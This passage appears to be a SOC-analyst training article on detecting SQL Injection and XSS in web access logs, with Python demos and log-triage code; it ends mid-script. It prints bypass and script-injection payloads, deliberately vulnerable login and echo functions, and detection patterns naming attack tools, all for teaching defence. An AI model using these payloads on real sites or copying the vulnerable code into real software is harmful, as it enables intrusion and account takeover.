Request.</p><p>● <strong>Server</strong>: Information about the web server software, often including its version and sometimes the operating system. Because this helps attackers fingerprint the server, it is commonly trimmed in hardened configurations.</p><p>● <strong>Last-Modified</strong>: Information about when the requested resource was last changed. 
This header is used for the cache mechanism.</p><p>● <strong>Content-Type</strong>: The type of data that is sent.</p><p>● <strong>Content-Length</strong>: The size of the data sent, in bytes.</p><p><strong>Response Body</strong></p><p>The HTTP Response Body contains the resource that was requested by the client and sent by the server.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/528/0*tVANU8Z_mKnSU0l1.png" /></figure><h3>Detecting SQL Injection Attacks</h3><h3>What is SQL Injection (SQLi)?</h3><p>SQL Injection is a critical attack method that becomes possible when a web application directly includes unsanitized data provided by the user in its SQL queries.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/379/0*28UPl09Z-LiJSQog.png" /></figure><p>The frameworks we use these days to develop web applications have preventive mechanisms in place to protect against SQL Injection attacks. But we still come across SQL Injection vulnerabilities, because sometimes raw SQL queries are used, sometimes the framework itself has a SQL Injection vulnerability, or the framework is not used properly.</p><h3>SQL Injection Types</h3><p>There are 3 types of SQL Injection. These are:</p><ol><li><strong>In-band SQLi (Classical SQLi)</strong>: If the SQL query is sent and its result comes back over the same channel (query results or database error messages appear directly in the HTTP response), we call this In-band SQLi. It is easier for attackers to exploit than the other SQLi categories.</li><li><strong>Inferential SQLi (Blind SQLi):</strong> The result of the injected query is never shown directly; the attacker infers it from the application&#39;s behaviour, such as a true/false difference in the page content or a deliberate time delay. It is called Blind SQLi because the reply cannot be seen.</li><li><strong>Out-of-band SQLi</strong>: If the result of the SQL query is communicated over a different channel, this type of SQLi is called Out-of-band SQLi. 
For example, if the attacker receives the results of his SQL queries over DNS, this is called Out-of-band SQLi.</li></ol><h3>How Does SQL Injection Work?</h3><p>Today standard web applications most commonly receive data from a user and use this data to display specific content. The login page is where most SQL Injection attacks happen. Let’s examine how SQL injection works through an example.</p><p>A user is generally expected to enter his/her username and password on the login page. On the other side, the web application will use this username and password to create a SQL query like the one below:</p><blockquote><em>SELECT * FROM users WHERE username = '</em><strong><em>USERNAME</em></strong><em>' AND password = '</em><strong><em>USER_PASSWORD</em></strong><em>'</em></blockquote><p>The meaning of this SQL query is “bring me all the information from the users table about the user whose name is <strong>USERNAME</strong> and whose password is <strong>USER_PASSWORD</strong>”. If the web application finds a matching user, it will authenticate the user; if it cannot find a user after the query is performed, the login will be unsuccessful.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/472/0*eMU63PxOybeVlRuX.png" /></figure><p>Let’s say your username is “<strong>john</strong>”, and your password is “<strong>supersecretpassword</strong>”. When you enter this information and click on the login button, the SQL query below will be executed and you will be able to enter because a match was found.</p><blockquote><em>SELECT * FROM users WHERE username = '</em><strong><em>john</em></strong><em>' AND password = '</em><strong><em>supersecretpassword</em></strong><em>'</em></blockquote><p>So, what if we did not use this system the way it was designed and we put an apostrophe (') in the username area? 
The SQL query will be as below, and the database will return an error because the query is malformed (the extra apostrophe breaks the string literal).</p><blockquote><em>SELECT * FROM users WHERE username = '</em><strong><em>john</em></strong><em>'' AND password = '</em><strong><em>supersecretpassword</em></strong><em>'</em></blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/713/0*H_4Wqi5d-saFjVIM.png" /></figure><p>An attacker would be glad to get an error message. The attacker can use the information in the error message to his advantage, and it also shows him that he is on the right path. What if the attacker enters a payload like the one below into the username area?</p><blockquote><em>' OR 1=1 -- </em></blockquote><p>When the attacker sends the payload, the web application will execute the following SQL query:</p><blockquote><em>SELECT * FROM users WHERE username = '' OR 1=1 -- ' AND password = '</em><strong><em>supersecretpassword</em></strong><em>'</em></blockquote><p>In SQL, whatever comes after “--” on the same line is treated as a comment (MySQL additionally requires a space after the two dashes, which is why payloads often end in “-- ” or “-- -”). So if we look at the query above, everything after “--” means nothing to the database. Let’s remove that part to simplify things before we continue to examine the SQL query.</p><blockquote><em>SELECT * FROM users WHERE username = '' OR 1=1</em></blockquote><p>The query above now reads: “<strong>the username is empty or 1=1</strong>”. It does not matter whether the username matches, because 1 is always equal to 1. The WHERE clause is therefore true for every row, the query returns the whole users table, and the application typically logs the attacker in as the first user returned (often an administrator). The attacker enters the web application because there is a match.</p><p>This example is a typical SQL injection attack. 
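</p><p>The login query above, as an added example that is not part of the original post: the same query built by string concatenation (the vulnerable form the text describes) next to a parameterised version, both run against a constructed in-memory SQLite table holding the john / supersecretpassword row. The table, the row and the function names are assumptions made for this demonstration; SQLite treats two dashes as a line comment, so the payload from the text behaves as described.</p>

```python
"""Added example (not from the original post): the login query from the text,
built by string concatenation (vulnerable) and with bound parameters (safe),
run against a constructed in-memory SQLite users table."""
import sqlite3


def make_db():
    """Constructed sample data: one user, john / supersecretpassword."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'john', 'supersecretpassword')")
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query exactly as the text describes: user input is pasted into
    the SQL text, so quotes and comment markers in it become part of the query.
    Returns the matched username or None; a malformed query raises sqlite3.Error."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver sends the input as data, so it is never
    parsed as SQL, whatever characters it contains."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Runs the three inputs discussed in the text through both versions."""
    conn = make_db()
    results = {}
    # 1. A normal login works in both versions.
    results["normal_vuln"] = login_vulnerable(conn, "john", "supersecretpassword")
    results["normal_safe"] = login_safe(conn, "john", "supersecretpassword")
    # 2. A stray apostrophe breaks the concatenated query: the database throws a
    #    syntax error (the attacker's first hint). The safe version just finds no user.
    try:
        login_vulnerable(conn, "john'", "supersecretpassword")
        results["quote_vuln"] = "no error"
    except sqlite3.Error:
        results["quote_vuln"] = "error"
    results["quote_safe"] = login_safe(conn, "john'", "supersecretpassword")
    # 3. The bypass payload: OR 1=1 makes the WHERE clause true for every row and
    #    the -- comment discards the password check, so the first user is returned.
    payload = "' OR 1=1 -- "
    results["bypass_vuln"] = login_vulnerable(conn, payload, "wrong")
    results["bypass_safe"] = login_safe(conn, payload, "wrong")
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

<p>The parameterised version is what the prevention section below means by avoiding raw SQL: the apostrophe and the comment marker are delivered to the database as data and never reach the SQL parser, so the bypass returns no user and the stray quote produces no error message for the attacker to learn from.</p><p>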
Of course, SQL injection attacks are not limited to this example; depending on the database, the attacker may be able to execute operating system commands through SQL, for example with the <strong>xp_cmdshell</strong> stored procedure on Microsoft SQL Server.</p><h3>What Attackers Gain from SQL Injection Attacks</h3><p>In order to understand why SQL Injection attacks are so critically important, let’s take a look at what a SQL injection attack can cause.</p><ul><li>Authentication bypass</li><li>Command execution</li><li>Exfiltrating sensitive data</li><li>Creating/deleting/updating database entries</li></ul><h3>How to Prevent SQL Injections</h3><ul><li><strong>Use parameterized queries (prepared statements):</strong> pass user input to the database as bound parameters instead of concatenating it into the query string. This is the primary defence, and every mainstream framework and database driver supports it.</li><li><strong>Use a framework:</strong> of course just using a framework will not be sufficient to prevent a SQL Injection attack. It is of utmost importance to use the framework in accordance with its documentation.</li><li><strong>Keep your framework up to date:</strong> Keep your web application secure by following security updates related to the framework you use.</li><li><strong>Always validate data received from a user:</strong> Never trust data received from a user. On top of that, do not only check the form data but also do the same with other data (such as headers, URLs, etc.).</li><li><strong>Avoid raw SQL queries:</strong> You may have a habit of writing raw SQL queries, but you should make use of the query builder or ORM a framework provides, and of the security that comes with it.</li></ul><h3>Detecting SQL Injection Attacks</h3><p>We have discussed what attackers can do with a SQL Injection attack in the previous section. Each of the results of a SQL Injection stated above could cause great loss for an institution, so as SOC Analysts we should be able to detect these attacks and take precautions against them.</p><p>So, how can we detect SQL Injection attacks?</p><p>There is more than one answer to this question. 
These are:</p><ul><li><strong>When examining a web request, check every field that comes from the user: </strong>Because SQL Injection attacks are not limited to form fields, you should also check HTTP Request Headers like User-Agent, Cookie and Referer.</li><li><strong>Look for SQL keywords: </strong>Look for words like INSERT, SELECT, UNION, WHERE within the data received from users.</li><li><strong>Check for special characters: </strong>Look for apostrophes (&#39;), comment markers (--, #, /*) or parentheses, which are used in SQL, and other special characters frequently used in SQL attacks, within the data received from the user. Remember that in logs these are usually URL-encoded (an apostrophe appears as %27).</li><li><strong>Familiarize yourself with frequently used SQL Injection payloads:</strong> Even though SQL payloads change according to the web application, attackers still use some common payloads to check for SQL Injection vulnerabilities. If you are familiar with these payloads, you can easily detect SQL Injection attempts. You can see some frequently used SQL Injection payloads <a href="https://github.com/payloadbox/sql-injection-payload-list">here</a>.</li></ul><h3>Detecting Automated SQL Injection Tools</h3><p>Attackers use many automated tools to find SQL Injection vulnerabilities. One of the best known is sqlmap. Let’s look at the wider picture instead of focusing on a specific tool.</p><p>You may use the methods listed below to detect SQL Injection tools:</p><ol><li><strong>Look at the User-Agent: </strong>Automated tools generally record their names and versions in the User-Agent header, so you can look at it to detect them (although a careful attacker can change it).</li><li><strong>Check the frequency of requests: </strong>Automated tools are designed to send many requests per second in order to test payloads as quickly as possible. 
A normal user might send one request per second at most, so you can tell whether requests are made by an automated tool by looking at the number of requests per second from one source.</li><li><strong>Look at the contents of the payload: </strong>Automated tools often leave their own names in their payloads. For example, a SQL Injection payload sent by an automated tool could look like this: <strong>sqlmap&#39; OR 1=1</strong></li><li><strong>Is the payload complicated: </strong>This detection method may not always work, but based on my experience I could say that automated tools send more complicated payloads.</li></ol><h3>Detection Example</h3><p>We have the access logs of a web application that was the victim of a SQL Injection attack.</p><p>You may not have come across access logs before. In short, an access log is the web server’s record of every request it served. Each entry usually contains the source IP address, date, requested URL, HTTP method, User-Agent and HTTP Response code, and, when the server is configured for it, the response size. These logs are very useful in investigations.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*Y6PHrP2JnSn2X1rY.png" /></figure><p>(SQL Injection Access Logs)</p><p>We have an access log in hand. Now what do we do?</p><p>Firstly, when we look at the pages that were requested we see that besides pages like “info.php”, which are fairly readable, there are also requests for pages that are complex and contain symbols like %. We cannot say that requests for pages like these are malicious on their own, but the fact that they are made repeatedly and many times is suspicious.</p><p>First of all, let’s talk about what the % symbols mean. When we request a page that contains special characters, these requests are not transferred to the web server as is. Instead, our browsers perform URL encoding (percent-encoding) of the special characters, replacing each one with a string that begins with % followed by 2 hexadecimal characters (the byte value of the character). 
So the URLs containing % in the logs above are URLs that contain special characters, encoded so that they survive transport.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/951/0*K5l16WctVwVw5xgV.png" /></figure><p>Now that we understand what the % sequences mean, let’s revisit the access logs. Even without decoding, readable words such as “UNION”, “SELECT”, “AND” and “CHR” stand out between the encoded characters. Because these are SQL keywords, and because they appear together in the same parameter, we can be confident that we are looking at a SQL Injection attack.</p><p>To spare our eyes, let’s make the examination a little easier :) A search for “Online URL Decoder” will find web applications that decode URLs automatically, and I will use one of them to make the access logs easier to read.</p><p>One important note: it is not wise to paste something like an access log, which contains sensitive information about your users and infrastructure, into a third-party web application. The logs I am uploading here were prepared specifically for this training, so there is no problem in my doing so. In your professional life, use an offline decoder (a local script, your SIEM’s decoding functions, or a tool such as CyberChef run locally) instead.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*4nDWyiUVey3r-Dsd.png" /></figure><p>After URL decoding we can see much more clearly that this is a SQL Injection attack. So what now? We have confirmed that it is a SQL Injection attack, but do we stop there?</p><p>Of course not. Next we extract every other piece of information the access logs can give us.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*CWJAYx572pVqL58q.png" /></figure><p>First, let’s look at the request timestamps. All of the SQL Injection payloads were sent at “19/Feb/2022 11:09:24”: more than 50 requests within a single second. 
So many requests in such a short time tell us that this is an automated attack. Additionally, as we mentioned before, attackers testing by hand start with simple payloads, whereas the payloads in these logs are complex from the very first request. That also points to an automated tool.</p><p>We have confirmed that a SQL Injection attack was performed, and that it was performed with an automated tool. So we can end our analysis, right?</p><p>There is one more step. We need to determine whether the attack was successful. The reliable way is to look at the HTTP responses, but in your professional career you will rarely have the response bodies logged. What you usually do have is the response size recorded in the access log. Because every request here targets the same page and the same “id” parameter, the responses should all be about the same size when the injection fails (the application returns the same error page or the same empty result each time). A response that is noticeably larger or smaller than the rest suggests that a payload changed what the database returned, for example a UNION SELECT that added rows or an error message that leaked into the page.</p><p>Unfortunately, the basic web server that was written for this example does not record a reliable response size, so we cannot estimate the outcome of this attack from these logs. With a correctly configured web server the size is present in every access log entry (the last numeric field in the Apache combined format, or body_bytes_sent in nginx). Compare the sizes across the injection requests: if most are identical and a few differ noticeably, the differing ones are the requests to examine first, and the attack may well have been successful. 
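</p><p>The checks above can be scripted so that a whole extract is triaged at once. The following Python is an added example written for this article, not code from the original training material or from any tool it mentions. It parses Apache combined-format lines (the log lines, the source addresses and the sqlmap User-Agent in them are constructed for the demonstration, not taken from the screenshots), URL-decodes the query string, looks for SQL keywords and break-out characters in every attacker-controlled field, counts requests per source per second, spots tool User-Agents, and reports response-size differences for the same page, which is the success signal discussed above.</p>

```python
"""Triage access-log lines for SQL Injection, the way the analysis above does by hand.

Added example, not code from the original article.  The log lines, IP addresses
and timestamps below are constructed for the demonstration and are not taken
from the article's screenshots.  Format assumed: Apache "combined" log format
(nginx's default format is compatible).
"""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# host ident user [time] "method url protocol" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-) "([^"]*)" "([^"]*)"'
)
SQL_KEYWORDS = re.compile(
    r"\b(union|select|insert|update|delete|drop|sleep|benchmark|waitfor|information_schema|chr|concat)\b",
    re.IGNORECASE,
)
# "OR 1=1", "AND 'a'='a": a boolean clause comparing two literals
SQL_TAUTOLOGY = re.compile(r"\b(or|and)\b\s*['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.IGNORECASE)
# characters needed to break out of the original query or comment out its tail
SQL_SPECIALS = re.compile(r"('|--|;|/\*|\*/|#)")
# default User-Agent strings of common tools; attacker-controlled, so absence proves nothing
TOOL_UA = re.compile(r"(sqlmap|havij|nikto|acunetix|wfuzz|python-requests|python-urllib|curl)", re.IGNORECASE)
AUTOMATED_RPS = 10   # assumed threshold for "a tool, not a person"; the article's extract showed 50+

# Constructed sample: one benign request, three sqlmap probes in the same second, one benign request.
RAW_LOGS = """\
10.0.0.7 - - [19/Feb/2022:11:09:24 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Feb/2022:11:09:24 +0000] "GET /index.php?id=1%27%20AND%201%3D1--%20 HTTP/1.1" 200 5120 "-" "sqlmap/1.6"
10.0.0.7 - - [19/Feb/2022:11:09:24 +0000] "GET /index.php?id=1%27%20UNION%20SELECT%20NULL%2CCHR%2865%29--%20 HTTP/1.1" 200 5388 "-" "sqlmap/1.6"
10.0.0.7 - - [19/Feb/2022:11:09:24 +0000] "GET /index.php?id=1%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 5120 "-" "sqlmap/1.6"
10.0.0.42 - - [19/Feb/2022:11:09:31 +0000] "GET /info.php HTTP/1.1" 200 731 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into fields; the query string is URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, url, status, size, referer, ua = m.groups()
    path, _, query = url.partition("?")
    return {
        "ip": ip,
        "second": ts.split()[0],          # "19/Feb/2022:11:09:24": one bucket per second
        "method": method,
        "path": path,
        "query": unquote_plus(query),     # %27 becomes ', %20 and + become a space
        "referer": referer,
        "ua": ua,
        "status": int(status),
        "size": None if size == "-" else int(size),
    }


def sqli_indicators(rec):
    """Reasons a single request looks like SQL Injection (empty list = clean)."""
    reasons = []
    for field in ("query", "referer", "ua"):      # every attacker-controlled field, not just the URL
        value = rec[field]
        keywords = {k.lower() for k in SQL_KEYWORDS.findall(value)}
        if SQL_TAUTOLOGY.search(value):
            keywords.add("tautology")
        specials = set(SQL_SPECIALS.findall(value))
        # one keyword alone (a search for "select") is weak; keyword plus break-out character is strong
        if keywords and specials:
            reasons.append(f"{field}: {sorted(keywords)} with {sorted(specials)}")
        elif len(keywords) >= 2:
            reasons.append(f"{field}: multiple SQL keywords {sorted(keywords)}")
    if TOOL_UA.search(rec["ua"]):
        reasons.append(f"ua: automated tool signature {rec['ua']!r}")
    return reasons


def triage(raw_logs):
    """Summarise one log extract: suspicious requests, sources, rate, automation, size spread."""
    records = [r for r in (parse_line(line) for line in raw_logs.splitlines()) if r]
    hits = [(r, sqli_indicators(r)) for r in records]
    hits = [(r, why) for r, why in hits if why]
    per_second = Counter((r["ip"], r["second"]) for r, _ in hits)
    tool_seen = any("automated tool" in reason for _, why in hits for reason in why)
    # a failed injection usually returns the same page each time; a different size for the
    # same (source, page) marks the request to look at first when judging success
    sizes = defaultdict(list)
    for r, _ in hits:
        if r["size"] is not None:
            sizes[(r["ip"], r["path"])].append(r["size"])
    size_outliers = {k: sorted(set(v)) for k, v in sizes.items() if len(set(v)) > 1}
    return {
        "suspicious": len(hits),
        "sources": sorted({r["ip"] for r, _ in hits}),
        "max_per_second": max(per_second.values(), default=0),
        "automated": tool_seen or any(n >= AUTOMATED_RPS for n in per_second.values()),
        "size_outliers": size_outliers,
        "reasons": [why for _, why in hits],
    }


if __name__ == "__main__":
    for key, value in triage(RAW_LOGS).items():
        print(f"{key}: {value}")
```

<p>Run it as a script to print the summary for the embedded sample. The threshold of 10 requests per second is an assumption for the example; any value well above what a person can type is a sign of a tool, and the article’s extract showed more than 50. The rate and the User-Agent are hints rather than proof, so the script only raises “automated” and lists size outliers; deciding whether the attack succeeded is left to the analyst.</p><p>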
Whenever the outcome cannot be confirmed from the logs alone, as here, it is best to escalate the alert to a higher-tier analyst rather than close it as unsuccessful.</p><p>What we know:</p><ol><li>A SQL Injection attack was performed against the “id” parameter of the web application’s main page.</li><li>The requests came from the IP address 192.168.31.174.</li><li>Because more than 50 requests were sent within one second, the attack was performed with an automated vulnerability scanning tool.</li><li>The complex nature of the payloads supports the claim in #3.</li><li>We cannot determine whether the attack was successful because the logs do not contain usable response sizes.</li></ol><h3>Detecting Cross Site Scripting (XSS) Attacks</h3><h3>What is Cross Site Scripting (XSS)?</h3><p>Cross Site Scripting (XSS) is an injection vulnerability in which an attacker gets a legitimate web application to deliver attacker-controlled script to other users’ browsers, where it runs with the privileges of that site.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/439/0*kvLg0TwclHPcejOK.png" /></figure><p>Today most frameworks used to develop web applications have built-in protection against XSS, typically by escaping output in their template engines. XSS is still common, however, because frameworks are sometimes not used, because developers bypass the built-in escaping (for example by marking untrusted data as “safe” HTML), or because the framework itself has an XSS vulnerability, and in each case data coming from the user reaches the page unsanitized.</p><h3><strong>XSS Types</strong></h3><p>There are 3 different types of XSS. These are:</p><ol><li><strong>Reflected XSS (Non-Persistent)</strong>: The payload is carried in the request itself (usually in a URL parameter) and is reflected back in the immediate response, so the victim has to be lured into sending the malicious request. It is the most common type of XSS.</li><li><strong>Stored XSS (Persistent)</strong>: The attacker is able to store the payload in the web application itself, for example in a comment, profile field or support ticket, where it is served to every user who views that content. 
Because it needs no interaction from the victim beyond visiting a normal page, Stored XSS is the most dangerous of the three types.</li><li><strong>DOM Based XSS</strong>: DOM Based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. (OWASP) In practice this means the server response may be perfectly clean: client-side JavaScript reads a value such as location.hash or document.URL and writes it into the page with innerHTML or document.write, so the payload may never appear in server logs.</li></ol><h3>How XSS Works?</h3><p>Like the other web attacks in this series, XSS is caused by a lack of output sanitization. An XSS vulnerability exists whenever data received from the user is written into the HTTP response without being escaped for the context (HTML body, attribute, JavaScript or URL) it is placed in.</p><p>Let’s follow an example to better understand XSS attacks.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/386/0*O8VjvIcn0KQ9TgmB.png" /></figure><p>Look at the piece of code above. What it does is very basic: it displays whatever is entered in the ‘user’ parameter. If we enter “LetsDefend” as the ‘user’ parameter, we see the words “Hello LetsDefend”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/656/0*SKQm3SACO7iV1PYY.png" /></figure><p>So far there is no problem. If we enter ordinary data in the user parameter, we are greeted with a warm salutation. But, as we can see in the code, there is no check on the user parameter at all. Whatever we enter in “user” is copied verbatim into the HTTP response we receive back.</p><p>So, what happens if we do not enter a normal value but instead a payload that opens a pop-up?</p><p>Payload: <strong>&lt;script&gt;alert(1)&lt;/script&gt;</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*1q0g2kv4jnZUwEtI.png" /></figure><p>Because whatever we enter in the “user” parameter is included directly in the HTTP response, the browser parses our input as HTML, the JavaScript we wrote runs, and a pop-up window appears on the screen.</p><p>So, this is exactly how XSS works. 
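</p><p>To see the difference between the vulnerable page and a fixed one, here is an added Python example; it is not the article’s PHP code (which appears only in the screenshot) and not part of the original post. It re-creates the “Hello user” page twice: render_unsafe() copies the decoded parameter straight into the HTML like the code above, and render_safe() HTML-escapes it at the moment of output. A small HTML parser stands in for the browser and counts the script elements it would execute; the URLs are the ones from this section and the parameter stays URL encoded, exactly as it is sent and logged.</p>

```python
"""Reflected XSS: the vulnerable echo from the article, beside its hardened form.

Added example.  The article's own code is PHP and shown only as an image; this
Python re-creation illustrates the same flaw and is not that code.  The URLs
are the ones discussed in the text; the 'user' parameter is kept URL encoded,
as a browser sends it and as it appears in access logs.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit


def user_param(url):
    """Extract and URL-decode the 'user' parameter, as the web server would."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("user", [""])[0]


def render_unsafe(user):
    """VULNERABLE: the decoded parameter is copied into the HTML verbatim."""
    return "Hello " + user


def render_safe(user):
    """HARDENED: escape for the HTML body/attribute context at the moment of output.
    (A value placed inside a script block or a URL needs a different encoder.)"""
    return "Hello " + html.escape(user, quote=True)


class ScriptCounter(HTMLParser):
    """Stand-in for the browser: counts the script elements the HTML parser sees."""

    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def scripts_in(markup):
    """Number of script elements a browser would execute in the given markup."""
    parser = ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts


BENIGN_URL = "https://letsdefend.io/xss_example.php?user=LetsDefend"
# The alert and redirect payloads from this section, URL encoded (%3C and %3E are the angle brackets).
ALERT_URL = "https://letsdefend.io/xss_example.php?user=%3Cscript%3Ealert(1)%3C/script%3E"
REDIRECT_URL = ("https://letsdefend.io/xss_example.php"
                "?user=%3Cscript%3Ewindow.location=%27https://google.com%27%3C/script%3E")


def compare(url):
    """Return (scripts executed with the unsafe page, scripts executed with the safe page)."""
    user = user_param(url)
    return scripts_in(render_unsafe(user)), scripts_in(render_safe(user))


if __name__ == "__main__":
    for url in (BENIGN_URL, ALERT_URL, REDIRECT_URL):
        print(url, compare(url))
```

<p>For the alert and redirect URLs, the unsafe page yields one executable script element and the safe page none; the benign “LetsDefend” value renders identically in both. html.escape is the right encoder for text placed in the HTML body or in a quoted attribute; a value placed inside a script block, a URL or CSS needs the encoder for that context, which is why frameworks escape at the template level rather than on input.</p><p>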
Because the value entered by the user is never validated or escaped, the attacker can inject whatever JavaScript he likes and the victim’s browser will run it. What if the attacker wants to redirect the user to a malicious site?</p><p>Payload: <strong>&lt;script&gt;window.location=’https://google.com’&lt;/script&gt;</strong></p><p><a href="https://letsdefend.io/xss_example.php?user=%3Cscript%3Ewindow.location=%27https://google.com%27%3C/script%3E">https://letsdefend.io/xss_example.php?user=%3Cscript%3Ewindow.location=%27https://google.com%27%3C/script%3E</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/864/0*0htL5Q4qXrmY2Z6L.png" /></figure><p>Of course we are not going to send you to a malicious web application; redirecting you to Google is sufficient as an example. When a user clicks on the URL, he is taken to Google instead of the perfect LetsDefend web application. Note that the payload is already URL encoded in the link: this is exactly the form in which you will see it in access logs.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*lhzlsEFOtM3ty8IK.png" /></figure><h3>How Attackers Leverage with XSS Attacks</h3><p>Because XSS is a client-side attack, it may seem less important than attacks against the server, but its impact should not be underestimated: the injected script runs in the victim’s browser with the victim’s identity on the vulnerable site.</p><p>Attackers can do the following with an XSS attack:</p><ul><li>Steal a user’s session information (cookies or tokens that are readable by script)</li><li>Perform any action the user is allowed to perform, by issuing requests from the victim’s browser</li><li>Capture credentials, for example with an injected fake login form or a keylogger</li></ul><p>…and other various functions.</p><h3>How to Prevent a XSS Vulnerability</h3><ul><li><strong>Sanitize data coming from a user: </strong>Never trust data coming from a user. 
Whenever user data is written into a page, HTML-encode it for the context it is placed in (for example &lt; becomes &amp;lt; and a double quote becomes &amp;quot;) at the moment of output. Encoding on output rather than on input protects every page that shows the value and keeps the stored data intact.</li><li><strong>Use a framework: </strong>Most frameworks come with preventive measures against XSS attacks, usually automatic escaping in their template engines.</li><li><strong>Use the framework correctly: </strong>Almost all frameworks used to develop web applications provide output escaping, but if it is disabled or bypassed (for example by marking a value as trusted HTML or by building HTML with string concatenation) XSS vulnerabilities can still occur.</li><li><strong>Keep your framework up to date: </strong>Frameworks are developed by humans, so they too may contain XSS vulnerabilities. These are usually fixed in security updates, so make sure that your framework’s security updates are applied.</li></ul><h3>Detecting XSS Attacks</h3><p>As we mentioned in the previous article, according to a study by Acunetix, 75% of cyber attacks are performed over web applications. Because XSS is one of the most frequently tested vulnerabilities, you will see a lot of it during your career as a SOC analyst.</p><ul><li><strong>Look for keywords: </strong>The easiest way to catch XSS attempts is to look for keywords commonly used in XSS payloads, such as “script”, “alert”, “prompt”, “confirm”, “onerror”, “onload” and “javascript:”.</li><li><strong>Familiarize yourself with frequently used XSS payloads: </strong>Attackers largely use the same probe payloads to look for vulnerabilities before they exploit an XSS vulnerability. Familiarizing yourself with these payloads makes it much easier to recognize XSS attempts in logs. 
You can examine some frequently used payloads <a href="https://github.com/payloadbox/xss-payload-list">here</a>.</li><li><strong>Check whether special characters have been used: </strong>Check data coming from a user for the characters that XSS payloads depend on, such as greater than (&gt;), less than (&lt;), double quotes, single quotes and parentheses. In access logs these usually arrive URL encoded as %3E, %3C, %22, %27, %28 and %29, so search for the encoded forms too.</li></ul><h3>Example of a Detection</h3><p>In this example, we see access logs from an Apache server running Wordpress. Revisit the “Detecting SQL Injection Attacks” article above if you need a refresher on access logs.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*dV0Xj2bWFXPZGp2d.png" /></figure><p>Now, let’s examine the access logs that have been provided.</p><p>First, let’s take a general look at the requests and try to understand them. All of the requests are for the “/blog/” page, and only the value of the “s” parameter changes. If you pay attention to the URLs of the web pages you visit, you will have noticed that when you perform a search in Wordpress, the words you enter are sent in the “?s=” parameter. So what we are looking at is a series of Wordpress searches.</p><p>This time the requests are not as readable as in the “Detecting SQL Injection Attacks” example; most characters have been turned into %XX sequences by URL encoding. We will decode them in a moment, but first let’s look at the raw URLs and see whether we can recognize any words.</p><p>Even in the encoded form we notice JavaScript-related words such as “script”, “prompt” and “console.log”. When we see JavaScript in a search parameter, XSS immediately comes to mind. 
Once we URL-decode them, the requests become easy to read.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*FyCRcXE3snMitGbw.png" /></figure><p>Looking at the access logs again after URL decoding, we clearly see the XSS payloads. We can say with confidence that the Wordpress application these logs came from was the target of an XSS attack.</p><p>Looking at the source IP addresses, we see there is more than one. Are several attackers trying to perform an XSS attack at the same time? Or is one attacker rotating IP addresses to avoid being blocked by security products such as firewalls and IPS? If you look the addresses up, you will see that they belong to Cloudflare. Because the Wordpress application sits behind Cloudflare, it is normal that the connections the web server sees come from Cloudflare’s edge nodes; the real client address is only available if the server is configured to log the X-Forwarded-For or CF-Connecting-IP header that Cloudflare adds to each request.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*BRmKQcxf8vozFR8b.png" /></figure><p>Examining the timestamps, we find that a request was made every 3–4 seconds. A human could not type and submit this many distinct XSS payloads at such a steady pace, but on its own the rate is low enough that you might hesitate to call it excessive. Fortunately the User-Agent is available in this example, and it belongs to Python’s urllib library rather than to a browser. 
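</p><p>The two observations in this analysis, recognisable JavaScript in the decoded “s” parameter and a steady request cadence from a non-browser User-Agent, can be scripted. The following is an added Python example, not code from the original article: each event is a constructed (timestamp, URL-encoded value of the “s” parameter, User-Agent) triple modelled on the screenshot, with payloads drawn from common XSS probes and timestamps 3 to 4 seconds apart. It decodes each value (including double-encoded and entity-encoded variants), names the XSS techniques it finds, and, because the logged source IPs belong to Cloudflare, groups requests by User-Agent and measures how regular their spacing is.</p>

```python
"""Classify Wordpress search terms as XSS probes and check request cadence.

Added example, not from the original article.  Each event is a constructed
(timestamp, URL-encoded value of the "s" parameter, User-Agent) triple; the
payloads are common probes of the kind the article's screenshots show, and the
timestamps reproduce its 3-4 second spacing.  Because the logged source IP
belongs to the CDN, requests are grouped by User-Agent instead.
"""
import html
import re
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus
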